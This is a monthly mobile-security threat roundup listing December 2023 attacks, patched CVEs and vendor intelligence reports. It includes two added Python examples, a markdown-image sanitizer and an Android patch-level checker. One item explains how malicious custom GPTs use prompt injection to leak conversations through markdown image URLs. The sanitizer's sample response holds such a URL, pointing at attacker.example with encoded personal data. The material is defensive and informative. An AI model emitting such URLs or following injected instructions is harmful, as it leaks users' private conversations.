With a special focus on mobile apps and connected, unmanaged devices, this VMX Labs Cybersecurity Threat Roundup is compiled by Verimatrix cybersecurity researchers and data scientists. It includes links to notable threat advisories over the last month, information on vulnerabilities and patches, and links to recent intelligence reports.

Threat info

  • AutoSpill is a new attack on Android that steals login credentials while a password manager autofills saved credentials into a login page loaded in a WebView. WebView is a browser engine embedded in native apps to render web content without leaving the app. The attack abuses the Android autofill flow: the password manager fills the credentials for the website shown in the WebView, but the host app that owns the WebView can read what was filled, so a malicious host app harvests the user's credentials for that site. Most of the tested Android password managers were vulnerable even without JavaScript injection, and all of them were vulnerable when JavaScript is enabled in the WebView.
  • BLUFFS (Bluetooth Forward and Future Secrecy Attacks and Defenses, tracked as CVE-2023-24023) breaks the forward and future secrecy of Bluetooth Classic sessions by forcing the derivation of a weak, predictable session key that can be brute-forced and then reused across sessions. It is composed of six attacks exploiting architectural flaws in the Bluetooth specification (versions 4.2 through 5.4), so it is independent of the hardware model and software version. Various models of iPhone, Pixel, Mi, and Galaxy smartphones were confirmed to be affected.
  • Chameleon Android banking trojan (ABT) has a new variant that adds Italy and the UK to its existing targets in Australia and Poland. The variant walks the victim through the manual steps that circumvent Android 13's restricted settings countermeasure, so that the malware can be granted the Accessibility service permissions it then abuses. It also implements an alternative way of detecting the foreground application, which lets it trigger its overlay attack even when Accessibility permissions are not granted. Chameleon is an active threat that keeps evolving to defeat platform defenses.
  • Fake lockdown mode research demonstrates, as a proof of concept, a post-exploitation tampering technique: malware that is already running on an iPhone can deceive the victim into thinking that Lockdown Mode is enabled when it is not.
  • Malicious custom GPTs (ChatGPT's user-built "agents") can exfiltrate sensitive data from conversations to third-party servers without user consent, for example by instructing the model to emit a markdown image whose URL points at an attacker-controlled host and carries the conversation contents in its query string; the client fetches the image automatically. OpenAI has already implemented a fix for the ChatGPT web app; the iOS (and probably Android) apps are not patched yet.
  • Operation Triangulation disclosed the last exploit used in the chain that spied on the iPhones of Kaspersky security researchers. It abuses an undocumented hardware feature (CVE-2023-38606): writing to unknown memory-mapped I/O registers lets the attacker bypass the hardware-based kernel memory protection and write to arbitrary physical memory. It is still unknown how the attackers discovered this feature.
  • Smishing Triad is a Chinese-speaking threat actor specializing in SMS phishing (smishing). In their latest campaign, they impersonate the United Arab Emirates Federal Authority for Identity and Citizenship to steal personally identifiable information (PII) and credit card data from UAE residents and from foreigners living in or visiting the country.
  • SpyLoan, a family of malicious loan apps, surged in 2023. These apps lure people in need with quick loans, charge high interest, and harvest contacts, messages and other personal data from the victim's device in order to blackmail and harass them into paying. It is a digital loan-shark scheme that uses mobile apps to reach a far wider audience than a street operation could, and the app is always part of the scheme because it is what gives the operators access to the victim's sensitive data. Some of these apps even impersonate well-known financial service brands.
  • Xamalicious is an Android backdoor with adware behavior that had been downloaded more than 327,000 times from the Play Store. It abuses Android's Accessibility service to click ads and install apps without user consent. It is built with the Xamarin framework, so its logic lives in .NET assemblies rather than Dalvik bytecode, which adds another layer of obfuscation and hampers analysis.
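The exfiltration channel behind the malicious GPT item above is the rendering of model output: a prompt-injected GPT can make the model emit a markdown image whose URL carries the conversation to an attacker's server, and the chat client fetches that URL without any user action. The following is an added example, not OpenAI's fix and not code from the roundup, of the allowlist-style guard a chat client can apply to model output before rendering it. The allowed host, the query-length limit and the sample model response are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Assumption for this example: the chat UI only ever needs to load images
# from its own CDN. Any other host is a possible exfiltration sink.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}
# Legitimate image URLs rarely carry long query strings; encoded
# conversation data does. The limit is chosen for the example.
MAX_QUERY_LEN = 64

# Inline markdown images: ![alt](url "optional title")
_MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def is_safe_image_url(url: str) -> bool:
    """Allow only https URLs on an allowlisted host with a short query."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if parts.hostname is None or parts.hostname not in ALLOWED_IMAGE_HOSTS:
        return False
    if len(parts.query) > MAX_QUERY_LEN or parts.fragment:
        return False
    return True


def sanitize_markdown(text: str) -> tuple[str, list[str]]:
    """Replace unsafe inline images with a placeholder.

    Returns the sanitized markdown and the list of blocked URLs so the
    client can log them as a likely prompt-injection attempt.
    """
    blocked: list[str] = []

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        if is_safe_image_url(url):
            return match.group(0)
        blocked.append(url)
        return f"[image blocked: {alt or 'untrusted source'}]"

    return _MD_IMAGE.sub(_replace, text), blocked


# Constructed sample of a model response after a successful injection:
# the first image quietly leaks the conversation, the second is legitimate.
SAMPLE_RESPONSE = (
    "Here is the summary you asked for.\n"
    "![loading](https://attacker.example/i.png?d=dXNlcjogbXkgU1NOIGlzIDEyMy00NS02Nzg5)\n"
    "![logo](https://cdn.example.com/logo.png)\n"
)

if __name__ == "__main__":
    clean, leaks = sanitize_markdown(SAMPLE_RESPONSE)
    print(clean)
    for url in leaks:
        print("blocked:", url)
```

Only inline images are rewritten here because they load without a click; reference-style images and plain links would need the same treatment in a real client, and the blocked list is worth surfacing to the user rather than silently dropping, since it is direct evidence that the GPT's instructions have been tampered with.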

Vulnerabilities & patches

  • Android's December 2023 security updates (patch levels 2023-12-01 and 2023-12-05) fixed 90+ vulnerabilities, including three Qualcomm zero-days (CVE-2023-33063, CVE-2023-33107, and CVE-2023-33106) reported as being under limited, targeted exploitation in the wild. A security patch level of 2023-12-05 or later addresses all of these issues.
  • CISA added four vulnerabilities (CVE-2023-33106, CVE-2023-33107, CVE-2023-33063, and CVE-2022-22071) to its Known Exploited Vulnerabilities catalog after Qualcomm published details in its December 2023 security bulletin. Qualcomm had made patches for the first three available to OEMs in October 2023, and for CVE-2022-22071 in May 2022.
  • The Bluetooth stacks in Android, Linux, macOS, and iOS are all vulnerable, under certain conditions, to an unauthenticated keystroke injection attack (CVE-2023-45866): a nearby attacker pairs an emulated Bluetooth keyboard without user confirmation and can then type into the device. The issue was fixed in Android security patch level 2023-12-05 and in iOS 17.2.
  • 5Ghoul is a collection of 5G modem firmware vulnerabilities, several of which affect Qualcomm and MediaTek 5G modems. They enable denial-of-service (DoS) and connection-downgrade attacks from a malicious base station. 626 smartphone models are found to be affected, and not all of the vulnerabilities have been disclosed yet.
  • Apple backported the fixes for two actively exploited WebKit zero-days (CVE-2023-42916 and CVE-2023-42917) to older devices in the iOS 16.7.3 release.
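A practitioner's first question after a bulletin like the one above is whether a given device actually carries the level that contains the fixes. This added example (not from the roundup) reads the `ro.build.version.security_patch` property over adb and reports which of the Android issues listed above are still open for that level. The CVE-to-level table is taken from the bullet points above; the adb invocation assumes `adb` is on the PATH with an authorised device attached.

```python
import re
import subprocess

# Android issues named above and the earliest security patch level that
# carries their fix. All are vendor-side fixes, hence the -05 level rather
# than the -01 framework level.
FIXED_AT = {
    "CVE-2023-33063": "2023-12-05",
    "CVE-2023-33106": "2023-12-05",
    "CVE-2023-33107": "2023-12-05",
    "CVE-2023-45866": "2023-12-05",
}

_LEVEL_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def normalize_level(level: str) -> str:
    """Strip surrounding noise and validate a YYYY-MM-DD patch level."""
    level = level.strip()
    if not _LEVEL_RE.match(level):
        raise ValueError(f"not an Android security patch level: {level!r}")
    return level


def patch_level_ok(level: str, required: str) -> bool:
    """True when `level` is at or after `required`.

    ISO dates compare correctly as plain strings, so once the format has
    been validated no date parsing is needed.
    """
    return normalize_level(level) >= normalize_level(required)


def open_cves(level: str) -> list[str]:
    """CVEs from FIXED_AT whose fix is newer than the device's level."""
    return sorted(cve for cve, fixed in FIXED_AT.items()
                  if not patch_level_ok(level, fixed))


def device_patch_level(adb: str = "adb") -> str:
    """Read the patch level from an attached device (assumes adb and USB debugging)."""
    result = subprocess.run(
        [adb, "shell", "getprop", "ro.build.version.security_patch"],
        capture_output=True, text=True, check=True,
    )
    return normalize_level(result.stdout)


if __name__ == "__main__":
    level = device_patch_level()
    missing = open_cves(level)
    if missing:
        print(f"patch level {level}: still exposed to {', '.join(missing)}")
        raise SystemExit(1)
    print(f"patch level {level}: covers the December 2023 fixes")
```

The property is the only reliable indicator on the device itself; an OEM build date or Android version number says nothing about whether the vendor-side (-05) fixes were merged, which is exactly the distinction the Qualcomm zero-days above turn on.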

Intelligence reports

  • Kaspersky’s IT threat evolution in Q3 2023 Mobile Statistics Report shows that the total number of Android banking trojan (ABT) attacks slightly increased compared to Q3 2022. It also indicates a shift towards re-using the same ABT sample against multiple targets rather than using a unique sample per target.
  • Zimperium’s annual report states that Hook, Godfather, and Teabot are the most dangerous Android banking trojans in terms of the number of banks targeted.
  • Anubis, AhMyth, and SpinOk were the top three mobile malware families in November 2023, according to Check Point's Most Wanted Malware Report.
  • Cisco Talos' report shows that rebooting an iOS or Android device does not necessarily remove the Predator spyware: persistence is an optional feature of the spyware, enabled according to the license the customer bought.
  • The ESET Threat Report H2 2023 describes the threat landscape in the second half of 2023. It shows that Android malware detections increased by 22% compared to the first half of 2023.
  • Doctor Web’s November 2023 report indicates a decrease in Android malware activity compared to the previous month and the detection of over 20 malicious apps distributed via Play Store.